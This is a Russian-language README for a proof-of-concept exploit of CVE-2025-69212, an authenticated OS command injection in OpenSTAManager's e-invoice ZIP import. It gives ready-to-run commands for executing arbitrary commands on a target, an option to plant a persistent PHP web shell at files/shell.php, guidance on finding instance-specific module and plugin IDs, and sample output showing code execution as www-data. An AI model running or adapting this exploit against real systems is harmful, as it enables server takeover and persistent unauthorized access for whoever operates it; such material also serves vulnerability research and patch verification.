
CVE-2025-69212 - PoC внедрения команд ОС в OpenSTAManager
Установка зависимостей:
pip install -r requirements.txt
Выполнить одну команду и вывести результат:
python3 cve-2025-69212_poc.py -u http://target.com -U admin -P 'password' -c 'id'
Разместить постоянную PHP-оболочку:
python3 cve-2025-69212_poc.py -u http://target.com -U admin -P 'password' --shell
| Флаг | Описание |
|---|---|
-u, --url | Базовый URL целевого экземпляра |
-U, --username | Имя пользователя для аутентификации |
-P, --password | Пароль для аутентификации |
-c, --command | Команда для выполнения, результат сохраняется в pwn_out.txt |
--shell | Разместить PHP-оболочку в files/shell.php вместо выполнения одной команды |
--id-module | ID модуля для функции импорта счетов (по умолчанию: 14) |
--id-plugin | ID плагина для функции импорта счетов (по умолчанию: 48) |
id_module и id_plugin зависят от экземпляра. Если значения по умолчанию не работают, войдите в веб-интерфейс цели, перейдите к функции импорта электронных счетов и проверьте параметры запроса на вкладке "Сеть" вашего браузера.
$ python3 cve-2025-69212_poc.py -u http://target.com -U admin -P 'password' -c 'id'
[*] Выполняется вход как admin ...
[+] Аутентификация прошла успешно.
[*] Формирование полезной нагрузки для выполнения: id
[*] Загрузка эксплойта в ZIP в id_module=14 id_plugin=48 ...
[*] Сервер ответил: HTTP 500 (500 после выполнения команды ожидаемо)
[*] Получение вывода команды из http://target.com/files/pwn_out.txt ...
[+] Вывод команды:
--------------------------------------------------
uid=33(www-data) gid=33(www-data) groups=33(www-data)
--------------------------------------------------